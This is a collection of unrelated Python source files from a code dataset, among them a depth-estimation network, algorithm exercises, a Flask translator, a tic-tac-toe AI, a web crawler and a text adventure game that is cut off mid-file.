x):\n return self.head(x)\n\n\nclass DepthNet(nn.Module):\n def __init__(self,\n num_classes: int,\n head_type: str,\n in_channels: int,\n width_list: List[int],\n patch_sizes: List[int],\n strides_list: List[int],\n num_blocks: List[int],\n num_heads: List[int],\n mlp_ratios: List[float],\n sr_ratios: List[int],\n is_out_feature_list: List[bool]):\n super().__init__()\n self.encoder = Encoder(in_channels, width_list=width_list, patch_sizes=patch_sizes, strides_list=strides_list,\n num_blocks=num_blocks, num_heads=num_heads, mlp_ratios=mlp_ratios, sr_ratios=sr_ratios,\n is_out_feature_list=is_out_feature_list)\n self.decoder = DecoderFPN(skip_channels_list=self.encoder.encoder_out_channels())\n self.head = self.build_head(head_type=head_type, in_channels=self.encoder.encoder_out_channels()[0],\n num_classes=num_classes)\n\n def build_head(self, head_type: str, in_channels: int, num_classes: int):\n if head_type == \"depth\":\n return DepthHead(in_channels, num_classes)\n if head_type == \"segmentation\":\n return SegHead(in_channels, num_classes)\n raise ValueError(f\"head_type: {head_type} is not supported.\")\n\n def forward(self, x):\n x = self.encoder(x)\n x = self.decoder(x)\n return self.head(x)\n\n\nclass DEST_B0(DepthNet):\n def __init__(self, in_channels: int = 3, num_classes: int = 1, head_type: str = \"depth\"):\n super().__init__(in_channels=in_channels,\n num_classes=num_classes,\n head_type=head_type,\n width_list=[32, 64, 128, 256],\n patch_sizes=[7, 3, 3, 3],\n strides_list=[4, 2, 2, 2],\n num_blocks=[2, 2, 2, 2],\n num_heads=[1, 2, 4, 8],\n mlp_ratios=[4, 4, 4, 4],\n sr_ratios=[8, 4, 2, 1],\n is_out_feature_list=[True, True, True, True])\n\n\nclass B0Encoder(Encoder):\n def __init__(self, in_channels: int = 3, num_classes: int = 1, head_type: str = \"depth\"):\n super().__init__(in_channels=in_channels,\n width_list=[32, 64, 128, 256],\n patch_sizes=[7, 3, 3, 3],\n strides_list=[4, 2, 2, 2],\n num_blocks=[2, 2, 2, 2],\n num_heads=[1, 2, 4, 8],\n mlp_ratios=[4, 4, 4, 4],\n sr_ratios=[8, 4, 2, 1],\n is_out_feature_list=[True, True, True, True])\n\nif __name__ == '__main__':\n from utils.conversion_utils import onnx_simplify\n\n # m = OverlapPatchEmbed(embed_dim=64, patch_size=7, stride=4, in_channels=3)\n # path = \"../checkpoints/overlap_path_embed.onnx\"\n # x = torch.randn(1, 3, 512, 1024)\n\n # m = SimplifiedAttention(embed_dim=64, num_heads=2, spatial_reduction_ratio=4)\n # path = \"../checkpoints/simplified_attention.onnx\"\n # x = torch.randn(1, 64, 64 * 128)\n # x = (x, 128, 256)\n\n # m = MixFFN(64, 64, expansion_ratio=4)\n # path = \"../checkpoints/mixffn.onnx\"\n # x = torch.randn(1, 64, 64 * 128)\n # x = (x, 64, 128)\n\n # m = Block(64, 4, mlp_ratio=4, sr_ratio=4)\n # path = \"../checkpoints/transformer_block.onnx\"\n # x = torch.randn(1, 64, 64 * 128)\n # x = (x, 64, 128)\n\n # m = EncoderStage(32, 64, patch_size=3, stride=2, num_blocks=2, num_heads=4, mlp_ratio=4, sr_ratio=4)\n # path = \"../checkpoints/transformer_stage.onnx\"\n # x = torch.randn(1, 32, 64, 128)\n\n # m = B0Encoder()\n # path = \"../checkpoints/b0_encoder.onnx\"\n # x = torch.randn(1, 3, 32, 64)\n\n # m = DecoderFPN([32, 64, 128])\n # path = \"../checkpoints/decoder_fpn.onnx\"\n # x = [\n # torch.randn(1, 32, 32, 32),\n # torch.randn(1, 64, 16, 16),\n # torch.randn(1, 128, 8, 8),\n # ]\n\n m = DEST_B0()\n path = \"../checkpoints/dest-b0.onnx\"\n x = torch.randn(1, 3, 512, 1024)\n\n # path = \"../checkpoints/tmp.onnx\"\n\n torch.onnx.export(m, x, path, opset_version=13)\n onnx_simplify(path, path)\n","repo_name":"lkdci/DEST_unofficial","sub_path":"models/dest.py","file_name":"dest.py","file_ext":"py","file_size_in_byte":16122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13340021068","text":"'''@Ericódigos - 11/06/2019 \nFundamentos são importantes. Uma prova disse é um algorítimo \nescrito a mais de 2300 anos por Euclides e que ainda hoje é \nabsolutamente útil e elegantemente econômico em termos de \nprocessamento.\n\nImagine um problema que exija uma função que retorne o \nMínimo Múltiplo Comum de um intervalo de inteiros.\n\n'''\n\nimport functools\nfrom datetime import datetime\n\ntime1 = datetime.now()\nlista = []\n\ndef mmc_Rank_C(lst):\n \"\"\" Retorna MMC de um intervalo de inteiros. \"\"\"\n itera = 0 # Contador de interações\n lst.sort() # Classifica a lista\n \n ''' Cria a lista com o intervalo entre o menor e o maior número. '''\n lista = list(range(lst[0],lst[-1]+1))\n \n ''' Retorna o fatorial do intervalo'''\n pior = functools.reduce(lambda a,b: a*b,lista)\n\n for e in range(0,pior,lista[-1]):\n itera += 1\n if all(e % i == 0 and e != 0 for i in lista):\n print('Iterações: ',itera)\n print('Resultado do MMC de ', lista) \n return e\n \n\nprint('-->',mmc_Rank_C([23,15]))\ntime2 = datetime.now()\nprint('A função demorou: ',(time2-time1))\n\n\n\n###########################\n\n\n\ntime1 = datetime.now()\n\ndef mmc_Rank_B(lista):\n lista.sort(reverse=True)\n novaLista = list(range(lista[0],lista[-1]-1,-1))\n quociente = 0\n loop = 1\n n = 0\n while(n != len(novaLista)):\n quociente = novaLista[0] * loop * novaLista[1]\n if all(quociente % e == 0 for e in novaLista):\n break\n loop+=1\n print('Iterações: ',loop) \n return quociente\n \nprint(mmcIntervaloOkay([23,15]))\ntime2 = datetime.now()\nprint('A função demorou: ',(time2-time1))\n\n\n###################################\n\n\ntime1 = datetime.now()\nitera = 0\ndef mmcIntervalo_Rank_S(lst):\n global itera\n mínimo = min(lst)\n máximo = max(lst)\n v_mmc = mmc(mínimo, mínimo+1)\n lista = list(range(mínimo,máximo))\n while(mínimo < máximo):\n mínimo += 1\n v_mmc = mmc(v_mmc,mínimo)\n print('Iterações: ',itera)\n print('O MMC de: ',lista)\n return v_mmc \n\ndef mdc(a,b):\n global itera\n while(b != 0):\n itera += 1\n t = a\n a = b\n b = t % b\n return a\n\ndef mmc(a,b):\n return int((a * b /mdc(a,b)))\n\nprint(mmcIntervalo_Rank_S([23,15]))\ntime2 = datetime.now()\nprint('A função demorou: ',(time2-time1))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n''' math.gcd(a, b) '''\n","repo_name":"ericodex/JS-ES6","sub_path":"MMC Euclides.py","file_name":"MMC Euclides.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"1618179294","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom zope.component import ComponentLookupError, getUtility\n\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.Five import BrowserView\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom plone.registry.interfaces import IRegistry\n\nfrom collective.complexrecordsproxy import ComplexRecordsProxy\nfrom collective.autopublishing.browser.autopublishsettings import (\n IAutopublishSettingsSchema,\n)\nfrom collective.autopublishing.eventhandler import handle_publishing, handle_retracting\n\nlogger = logging.getLogger(\"collective.autopublishing\")\n\n\nclass AutopublishReport(BrowserView):\n @property\n def portal(self):\n return getToolByName(self.context, \"portal_url\").getPortalObject()\n\n __call__ = ViewPageTemplateFile(\"autopublish_report.pt\")\n\n @property\n def report(self):\n catalog = getToolByName(self.context, \"portal_catalog\")\n\n try:\n settings = getUtility(IRegistry).forInterface(\n IAutopublishSettingsSchema,\n omit=(\"publish_actions\", \"retract_actions\"),\n factory=ComplexRecordsProxy,\n )\n except (ComponentLookupError, KeyError):\n logger.info(\n \"The product needs to be installed. No settings in the\" \" registry.\"\n )\n return\n\n if \"enableAutopublishing\" not in catalog.indexes():\n logger.info(\"Catalog does not have a enableAutopublishing index\")\n return\n\n p_result = handle_publishing(self.context, settings, dry_run=True, log=False)\n r_result = handle_retracting(self.context, settings, dry_run=True, log=False)\n\n result = {}\n result[\"p_result\"] = p_result\n result[\"r_result\"] = r_result\n return result\n","repo_name":"collective/collective.autopublishing","sub_path":"collective/autopublishing/browser/autopublishreport.py","file_name":"autopublishreport.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"10429997964","text":"# Zadanie 1. (pokrycie przedziałami jednostkowymi) Dany jest zbiór punktów X = {x1,...,xn} na prostej.\n# Proszę podać algorytm, który znajduje minimalną liczbę przedziałów jednostkowych domkniętych,\n# potrzebnych do pokrycia wszystkich punktów z X. (Przykład: Jeśli X = {0.25, 0.5, 1.6} to potrzeba\n# dwóch przedziałów, np. [0.2,1.2] oraz [1.4,2.4]).\n\n# ROZW: Sortuje punkty niemalejąco, następnie nowy przedział zaczynam od pierwszego niepokrytego.\n\ndef CoverIntervals(points):\n n = len(points)\n points.sort()\n cnt = 0\n curr = points[0] + 1 # aktualny koniec\n for i in range(n):\n if points[i] > curr: # nowy początek\n cnt += 1\n curr = points[i] + 1 # nowy koniec\n\n return curr\n\n\ntest = [0.25, 0.5, 1.6]\nprint(CoverIntervals(test))","repo_name":"YoC00lig/Algorithms-and-data-structures","sub_path":"Labs/lab7/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8459599921","text":"from flask import Flask, render_template, request\r\nfrom translatorE2F import english_to_french, french_to_english\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/translate/english_to_french', methods=['POST'])\r\ndef translate_english_to_french():\r\n if request.method == 'POST':\r\n text = request.form['text']\r\n translated_text = english_to_french(text)\r\n return render_template('result.html', text=text, translated_text=translated_text)\r\n else:\r\n return 'Method Not Allowed', 405\r\n\r\n@app.route('/translate/french_to_english', methods=['POST'])\r\ndef translate_french_to_english():\r\n if request.method == 'POST':\r\n text = request.form['text']\r\n translated_text = french_to_english(text)\r\n return render_template('result.html', text=text, translated_text=translated_text)\r\n else:\r\n return 'Method Not Allowed', 405\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","repo_name":"shivamehta/translateE2F","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74388029981","text":"import sys\nfrom collections import deque\n\n## 입력 및 그래프 생성\nN, M, V = map(int, sys.stdin.readline().split())\n\ngraph = [[] for _ in range(N + 1)]\nfor _ in range(M):\n a, b = map(int, sys.stdin.readline().split())\n \n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(0, len(graph)):\n graph[i].sort()\n\n## dfs 정의\ndef search_dfs(v):\n visited[v] = True\n print(v, end=\" \")\n \n for i in graph[v]:\n if not visited[i]:\n search_dfs(i)\n\n## bfs 정의\ndef search_bfs(start):\n visited[start] = True\n que = deque()\n que.append(start)\n\n while que:\n v = que.popleft()\n print(v, end=\" \")\n\n for i in graph[v]:\n if not visited[i]:\n que.append(i)\n visited[i] = True\n\n\nvisited = [False] * (N + 1)\nsearch_dfs(V)\n\nprint()\n\nvisited = [False] * (N + 1)\nsearch_bfs(V)","repo_name":"younhwan97/algorithm-practice","sub_path":"python/Search/백준-DFS와BFS.py","file_name":"백준-DFS와BFS.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"24974163466","text":"import random\r\nfrom btree import LinkedBinaryTree as Tree\r\n\r\n\r\nclass Board:\r\n \"\"\"Class for Board representation\"\"\"\r\n def __init__(self, board, last_turn=None):\r\n \"\"\"Create new Board\"\"\"\r\n self.board = board # string\r\n self.opponent = self.board[last_turn] if last_turn is not None else 'O'\r\n self.player = 'O' if self.opponent == 'X' else 'X'\r\n self.tree = Tree()\r\n\r\n def check_win(self, board=None):\r\n \"\"\"Checks if there is a winning combination on board\"\"\"\r\n if board is None:\r\n board = self.board\r\n if not self.player:\r\n return False\r\n for x in range(0, 3):\r\n row = {board[x * 3:][0], board[x * 3:][1], board[x * 3:][2]}\r\n column = {board[x], board[x + 3], board[x + 6]}\r\n if len(column) == 1:\r\n return board[x]\r\n if len(row) == 1:\r\n return board[x * 3:][0]\r\n\r\n diag1 = {board[0], board[4], board[8]} # diagonals\r\n diag2 = {board[2], board[4], board[6]}\r\n if len(diag1) == 1 or len(diag2) == 1:\r\n return board[4]\r\n if board.count(self.player) + board.count(self.opponent) == 9:\r\n return None # Draw\r\n return False\r\n\r\n def make_tree(self):\r\n \"\"\"Construct a decision tree\"\"\"\r\n def add(position, curr_player, leaves=[]):\r\n board = position.element()\r\n winner = self.check_win(board)\r\n if winner:\r\n self.tree.mark(position, 'win' + winner)\r\n leaves.append(position)\r\n return\r\n poss_moves = [int(i) - 1 for i in board if i != 'O' and i != 'X']\r\n if not poss_moves:\r\n self.tree.mark(position, 'draw')\r\n leaves.append(position)\r\n return\r\n\r\n moves = 2 if len(poss_moves) > 1 else 1\r\n for i in range(moves):\r\n move = random.choice(poss_moves)\r\n poss_moves.remove(move)\r\n p = self.tree.add(board[:move] + curr_player\r\n + board[move + 1:], p=position)\r\n add(p, 'X' if curr_player == 'O' else 'O', leaves)\r\n return leaves\r\n\r\n root = self.tree.add(self.board)\r\n leaves = add(root, self.player)\r\n return leaves\r\n\r\n def choose_move(self):\r\n \"\"\"Choose the best move for computer\"\"\"\r\n leaves = self.make_tree()\r\n root = self.tree.root()\r\n right, left = self.tree.right(root), self.tree.left(root)\r\n parents = {x.element(): 0 for x in [left, right] if x is not None}\r\n for leaf in leaves:\r\n parent = self.tree.find_parent(leaf).element()\r\n if leaf.mark() == 'win' + self.player:\r\n if parent == leaf.element():\r\n for i in range(9):\r\n if leaf.element()[i] != parent[i]:\r\n return i\r\n parents[parent] += 1\r\n elif leaf.mark() == 'win' + self.opponent:\r\n parents[parent] -= 1\r\n\r\n mean = sum(parents.values()) / len(parents) # check if all chances are\r\n if not all(parents[z] == mean for z in parents.keys()): # not equal\r\n next_board = max(parents, key=lambda x: parents[x])\r\n else:\r\n next_board = random.choice(list(parents.keys()))\r\n for i in range(9):\r\n if self.board[i] != next_board[i]:\r\n return i\r\n\r\n def draw(self):\r\n \"\"\"Print the game board\"\"\"\r\n print('\\n 1 2 3')\r\n for i in range(3):\r\n print(' ' + str(i + 1), end=' ')\r\n for j in range(3):\r\n cell = self.board[i * 3:][j]\r\n print(cell if cell == 'O' or cell == 'X' else ' ', end=' ')\r\n print()\r\n","repo_name":"lazyTurtle21/TicTacToe","sub_path":"task3/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35398438092","text":"import pickle\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport torchvision.transforms as T\nimport torchvision.transforms.functional as F\nfrom PIL import Image\nfrom tqdm import trange\n\nfrom depreciated.scaleadv import get_imagenet\nfrom depreciated.scaleadv import Align\nfrom depreciated.scaleadv import POOLING_MAPS\nfrom depreciated.scaleadv import Unscaling\nfrom depreciated.scaleadv import ScalingLayer\nfrom depreciated.scaleadv import ScalingAPI\nfrom depreciated.scaleadv.utils import set_ccs_font\n\n\"\"\"\npython -m scripts.plot_detection_blackbox [none|median] [ratio] [max queries]\n\"\"\"\n# Params\nDEFENSE, RATIO, QUERIES = sys.argv[1:]\nRATIO, QUERIES = map(int, [RATIO, QUERIES])\n\n# Load data\ntransform = T.Compose([Align(224, RATIO), T.ToTensor(), lambda x: np.array(x)[None, ...]])\ndataset = get_imagenet(f'val_{RATIO}', transform)\nid_list = pickle.load(open(f'static/meta/valid_ids.model_none.scale_{RATIO}.pkl', 'rb'))[::4]\n\n# Load scaling\nsrc_size, inp_size = (224 * RATIO, 224 * RATIO), (224, 224)\nscale_down = ScalingAPI(src_size, inp_size, 'cv', 'linear')\nscale_up = ScalingAPI(inp_size, src_size, 'cv', 'linear')\n\n# Load networks\nscaling_layer = ScalingLayer.from_api(scale_down).cuda()\npooling_layer = POOLING_MAPS[DEFENSE].auto(RATIO * 2 - 1, scale_down.mask).cuda()\n\n\ndef plot(det):\n # Run attack\n score_src, score_att = [], []\n bb = 'bb_med37' if DEFENSE == 'median' else 'bb'\n with trange(100) as pb:\n for i in pb:\n # find number of iterations\n try:\n data = pickle.load(open(f'static/{bb}/{i}.ratio_{RATIO}.def_{DEFENSE}.log', 'rb'))\n except FileNotFoundError:\n continue\n for it, query, _ in data:\n if query >= QUERIES:\n break\n\n # load images\n src, _ = dataset[id_list[i]]\n att = F.to_tensor(Image.open(f'static/{bb}/{i}.ratio_{RATIO}.def_{DEFENSE}.{it:02d}.png')).numpy()\n\n # compute scores\n score_src.append(det.score(src))\n score_att.append(det.score(att[None]))\n print(len(score_src))\n\n # Eval\n fig, axes = plt.subplots(ncols=2, figsize=(4, 2), constrained_layout=True)\n for i, name in enumerate(['MSE', 'SSIM']):\n ss, sa = [list(zip(*arr))[i] for arr in [score_src, score_att]]\n sns.distplot(ss, kde=False, label='Benign', ax=axes[i])\n sns.distplot(sa, kde=False, label='Attack', ax=axes[i])\n axes[i].set_xlabel(name)\n if name == 'SSIM':\n axes[i].set_xlim(-0.05, 1.05)\n axes[i].legend(frameon=False, borderaxespad=0, loc=i + 1)\n\n fig.suptitle(f'{det.name.title()} Defense ({QUERIES // 1000}K Queries)')\n fig.savefig(f'det-bb-{DEFENSE}-{det.name}.{QUERIES}.{RATIO}.pdf')\n\n from IPython import embed; embed(using=False); exit()\n\n\n# Get detection\ndet = [\n Unscaling(scale_down, scale_up, pooling_layer),\n # MinimumFilter(),\n]\nset_ccs_font(12)\nfor d in det:\n plot(d)\n","repo_name":"AHK-11/rethinking-image-scaling-attacks","sub_path":"depreciated/scripts/plot_detection_blackbox.py","file_name":"plot_detection_blackbox.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"36117246368","text":"# a simple web crawler to crawel MYEGY main pages\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nusrInput = int(input('Enter How many pages you like to crawl: '))\n\n\ndef wordList(maxPage):\n page = 1\n with open('site_content.txt', 'w') as content:\n\n while page <= maxPage:\n url = 'http://myegy.tv/?page=' + str(page)\n source = requests.get(url).text\n soup = BeautifulSoup(source, 'lxml')\n currentPage = '=========The Current Page is => ' + str(page) + '========='\n content.write(currentPage) # writes where you are before each page\n content.write('\\n')\n\n for text in soup.findAll('span', {'class': 'title'}):\n txt = text.string # grabs only the string from the html code\n content.write('\\n')\n\n for w in txt:\n content.write(w)\n content.write('\\n')\n content.write('\\n')\n page += 1\n content.close()\n\n\nwordList(usrInput)\n","repo_name":"cloud01001/egyCrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17697076012","text":"#Author: Navjeet Hundal\n#Version 1.0\n\n\n#This program is a text based game that you go between rooms and doors to find a way out.\n#Limitation: can only accept intergers from the user\n#Features: (1) Entrance room with three differnt options\n#(2) Kitchen where you can change the state of the lever\n#(3) Pantry where you can change the state of the dial\n#(4) Living room where you can go to to other rooms and pick up a string, view the soil\n#(5) Attic where you can pick up cheese and drop the string into a hole\n#(6) Bedroom where you can try to interact with a tomcat or feed a mouse\n\n\n#Creating contants \nOPTION_1 = 1\nOPTION_2 = 2\nOPTION_3 = 3\nOPTION_4 = 4\n\n\n#Creating a function that tells the entrance room's description\n#EntranceInfo(no parameters)\ndef EntranceInfo(Dial,Lever):\n print(\"\"\"Room: Entrance Room\n-------------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the entrance hallway.There is a mysterious door infront\nof you that that is sending out an unusual aura thats calling to you.To your\nleft is an entranceway into the pantry.To your right is an entranceway into\nthe kitchen.\"\"\",\"\\n\")\n\n print(\"The dial is currently set to\",Dial)\n print(\"The lever is currently set to\",Lever)\n print(\"Type '1' to try to open door\")\n print(\"Type '2' to go through the left entryway\")\n print(\"Type '3' to go through the right entryway\")\n\n\n#Creating a function that checks users input\n#EntranceInputCheck(int)\ndef EntranceInputCheck(Entrance_room_option,Dial,Lever):\n\n#Input check if user input is between 1-3 if not ask again\n if (Entrance_room_option > OPTION_3 or Entrance_room_option < OPTION_1):\n while (Entrance_room_option > OPTION_3 or Entrance_room_option < OPTION_1):\n print(\"\\n\")\n print(\"That option doesnt exist please choose from options 1-3\")\n EntranceInfo(Dial,Lever)\n Entrance_room_option = int(input(\"What would you like to do?\"))\n return Entrance_room_option #Return entrance_room_option to EntranceRoom\n\n\n#Creating a function that makes the entrance room \n#EntranceRoom(str,str)\ndef EntranceRoom(Dial,Lever):\n Entrance = True\n while (Entrance == True):\n EntranceInfo(Dial,Lever)\n Entrance_room_option = int(input(\"What would you like to do?\"))\n Entrance_room_option = EntranceInputCheck(Entrance_room_option,Dial,Lever)\n print(\"\\n\")\n\n#If user picks option 1 but the dial and lever are not set to the right position then tell them its locked\n if (Entrance_room_option == OPTION_1 and (Dial != \"red\" or Lever != \"back\")):\n print(\"That door is locked, try to find a way to open it\")\n \n# Opening the door if player has pressed all the correct buttons and ending the game\n if (Entrance_room_option == OPTION_1 and Dial == \"red\" and Lever == \"back\"):\n print(\"\"\"The door has been opened and pulled you in, as you look behind you it vanishes\ninto thin air\"\"\")\n Entrance = False #To break out of main loop \n\n# If player picked option 2 in entrance room take them to pantry \n if (Entrance_room_option == OPTION_2):\n Dial = Pantry(Dial,Lever)\n\n#If player picked option 3 take them to the kitchen\n if (Entrance_room_option == OPTION_3):\n Lever = Kitchen(Dial,Lever)\n\n\n#Creating a function that tells the pantry's description\n#PantryInfo(str)\ndef PantryInfo(Dial):\n print(\"\"\"Room: Pantry\n------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the pantry, you can smell the aroma of delicious foods.\nIn front of you is a dial with 3 different settings: blue, red and green.\nBehind you is the doorway back to the entrance room.\"\"\",\"\\n\")\n\n# Telling players options for pantry \n print(\"The dial is currently set to\",Dial) # Telling which dial is active\n print(\"Type '1' to turn the dial to blue\")\n print(\"Type '2' to turn the dial to red\")\n print(\"Type '3' to turn the dial to green\")\n print(\"Type '4' don't touch that dial! Return to entrance room\")\n \n\n#Creating a function that checks pantry input\n#PantryInputCheck(int,str)\ndef PantryInputCheck(Pantry_option,Dial):\n\n#Input check if user input is between 1-4 if not ask again\n if (Pantry_option < OPTION_1 or Pantry_option > OPTION_4):\n while (Pantry_option < OPTION_1 or Pantry_option > OPTION_4): # if input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-4\")\n PantryInfo(Dial)\n Pantry_option = int(input(\"What would you like to do?\"))\n \n return Pantry_option #Return Pantry_option to Pantry\n \n\n#Creating a function that changes the dial\n#Pantry(str,str)\ndef Pantry(Dial,Lever):\n while True:\n PantryInfo(Dial)\n Pantry_option = int(input(\"What would you like to do?\"))\n Pantry_option = PantryInputCheck(Pantry_option,Dial)\n print(\"\\n\")\n \n # Changing the dial to 'blue' if they picked option 1\n if (Pantry_option == OPTION_1):\n Dial = \"blue\"\n \n # Changing the dial to 'red' if they picked option 2\n if (Pantry_option == OPTION_2):\n Dial = \"red\"\n\n # Changing the dial to 'green' if they picked option 3\n if (Pantry_option == OPTION_3):\n Dial = \"green\"\n\n # If player choses option 4 break out of this loop and go back to entrance room\n if (Pantry_option == OPTION_4):\n print(\"\\n\")\n return Dial #Return Dial to EntranceRoom\n\n\n#Creating a function that tells the kitchens description\n#KitchenInfo(str)\ndef KitchenInfo(Lever):\n\n# Letting the players know their current room and giving a description of the room\n print(\"\"\"Room: Kitchen\n-------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the kitcken, you see many appliances around you.\nIn front of you is a lever that can be pushed into a forward position or pulled\nin the backward position.Behind you is the doorway back to the entrance room.\"\"\",\"\\n\")\n\n# Telling players the options for the kitchen \n print(\"The lever is currently set to\",Lever) # Telling which lever is active\n print(\"Type '1' to pull lever to the 'back' position\")\n print(\"Type '2' to push the lever to the 'forward' positon\")\n print(\"Type '3' don't touch the lever and return to entrance room\")\n\n\n#Creating a function that checks input for the kitchen\n#KitchenInputCheck(int,str)\ndef KitchenInputCheck(Kitchen_option,Lever):\n\n#Input check if user input is between 1-3 if not ask again\n if (Kitchen_option < OPTION_1 or Kitchen_option > OPTION_3):\n while (Kitchen_option < OPTION_1 or Kitchen_option > OPTION_3): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-3\")\n KitchenInfo(Lever)\n Kitchen_option = int(input(\"what would you like to do?\"))\n return Kitchen_option #Return Kitchen_option to Kitchen\n\n\n#Creating a function that changes the state of the lever\n#Kitchen(str,str)\ndef Kitchen(Dial,Lever):\n while True:\n KitchenInfo(Lever)\n Kitchen_option = int(input(\"what would you like to do?\"))\n Kitchen_option = KitchenInputCheck(Kitchen_option,Lever)\n print(\"\\n\")\n\n # Changing the lever to 'back' if they picked option 1\n if (Kitchen_option == OPTION_1):\n Lever = \"back\"\n \n # Changing the lever to 'forward' if they picked option 2\n if (Kitchen_option == OPTION_2):\n Lever = \"forward\"\n\n\n # Going back to main entrance if they picked option 3\n if (Kitchen_option == OPTION_3):\n print(\"\\n\")\n return Lever #Return Lever to EntranceRoom \n \n\n#Creating a function that tells the description of the living room\n#LivingRoomInfo(str,str)\ndef LivingRoomInfo(String,Cheese):\n print(\"\"\"Room: Living Room\n-----------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the living room in front of you is a pot of soil\nand a dark entranceway that leads to the bedroom.Towards your right there are\nstairs leading up to the attic.\"\"\",\"\\n\")\n\n print(\"The string is currently\",String)\n print(\"The cheese is currently\",Cheese)\n print(\"Type '1' to view the pot of soil\")\n print(\"Type '2' to take the stairs up leading to the next floor\")\n print(\"Type '3' to go through the dark entrance way\")\n if (String == \"not in your inventory\"): # only show when player doesnt have string\n print(\"Type '4' to pick up the ball of string on the floor\")\n\n\n#Creating a function that checks living room input\n#LivingRoomInputCheck(int,str,str,str)\ndef LivingRoomInputCheck(Living_room_option,String,Cheese,Mouse):\n\n#Input check if string is not in your inventory user can only input 1-4 if not ask again\n if (String == \"not in your inventory\"): \n while (Living_room_option > OPTION_4 or Living_room_option < OPTION_1):\n print(\"\\n\")\n print(\"That option doesnt exist please choose from options 1-4\",\"\\n\")\n LivingRoomInfo(String,Cheese)\n Living_room_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is gone or in your inventory user can only input 1-3 if not ask again \n if (String != \"not in your inventory\"):\n while (Living_room_option > OPTION_3 or Living_room_option < OPTION_1):\n print(\"\\n\")\n print(\"That option doesnt exist please choose from options 1-3\",\"\\n\")\n LivingRoomInfo(String,Cheese)\n Living_room_option = int(input(\"What would you like to do?\"))\n \n return Living_room_option # return user input to living room\n \n\n#Creating a function that makes the living room\n#LivingRoom(str,str,str)\ndef LivingRoom(String,Cheese,Mouse):\n Living_room = True\n Soil = \"not fertilized\"\n while (Living_room == True):\n LivingRoomInfo(String,Cheese)\n Living_room_option = int(input(\"What would you like to do?\"))\n Living_room_option = LivingRoomInputCheck(Living_room_option,String,Cheese,Mouse)\n print(\"\\n\")\n\n#If mouse is gone then the soil is fertilized and he goes back to the bedroom\n if (Mouse == \"gone\"):\n Soil = \"fertilized\"\n Mouse = \"out\"\n\n#If user input is 1 and the soil hasnt been fertilized by the mouse then view the soil \n if (Living_room_option == OPTION_1 and Soil != \"fertilized\"):\n print(\"The pot of soil looks dry\")\n\n#If user input is 1 and the mouse has fertilized the soil end game\n if (Living_room_option == OPTION_1 and Soil == \"fertilized\"):\n print(\"\"\"The soil has been fertilized and creates a giant vine that takes you\ninto the sky!\"\"\")\n Living_room = False #Ending the game by breaking out of the loop\n\n#If user input is 2 then go to the attic\n if (Living_room_option == OPTION_2):\n String, Cheese, Mouse = Attic(String,Cheese,Mouse)\n\n#If user input is 3 then go into the bedroom\n if (Living_room_option == OPTION_3):\n String, Cheese, Mouse = Bedroom(String,Cheese,Mouse)\n\n#If user input is 4 pick up the string \n if (Living_room_option == OPTION_4):\n String = \"in your inventory\"\n\n\n#Creating a function that tells the attic's description\n#AtticInfo(str,str)\ndef AtticInfo(String,Cheese):\n print(\"\"\"Room: Attic\n-----------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the attic to your left there is a small hole.To your right\nthere is a table with so much cheese on it.Behind you is a staircase back down\nto the living room\"\"\",\"\\n\")\n\n print(\"The string is currently\",String)\n print(\"The cheese is currently\",Cheese)\n print(\"Type '1' to go back to the living room \")\n print(\"Type '2' to pick up the cheese from the table\")\n if (Cheese == \"in your inventory\"): #If cheese is in inventory then give option 3\n print(\"Type '3' to drop the cheese down the hole\")\n if (String == \"in your inventory\"): #If string is in inventory then give option 4\n print(\"Type '4' to drop the string down the hole\")\n\n\n#Creating a function that checks input for the attic\n#AtticInputCheck(int,str,str,str)\ndef AtticInputCheck(Attic_option,String,Cheese,Mouse):\n\n#Input check if you dont have string but have cheese user can only input 1-3 if not ask again\n if (String != \"in your inventory\" and Cheese == \"in your inventory\"):\n while (Attic_option < OPTION_1 or Attic_option > OPTION_3): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-3\")\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is in your inventory and cheese is not user can only input 1-2 or 4 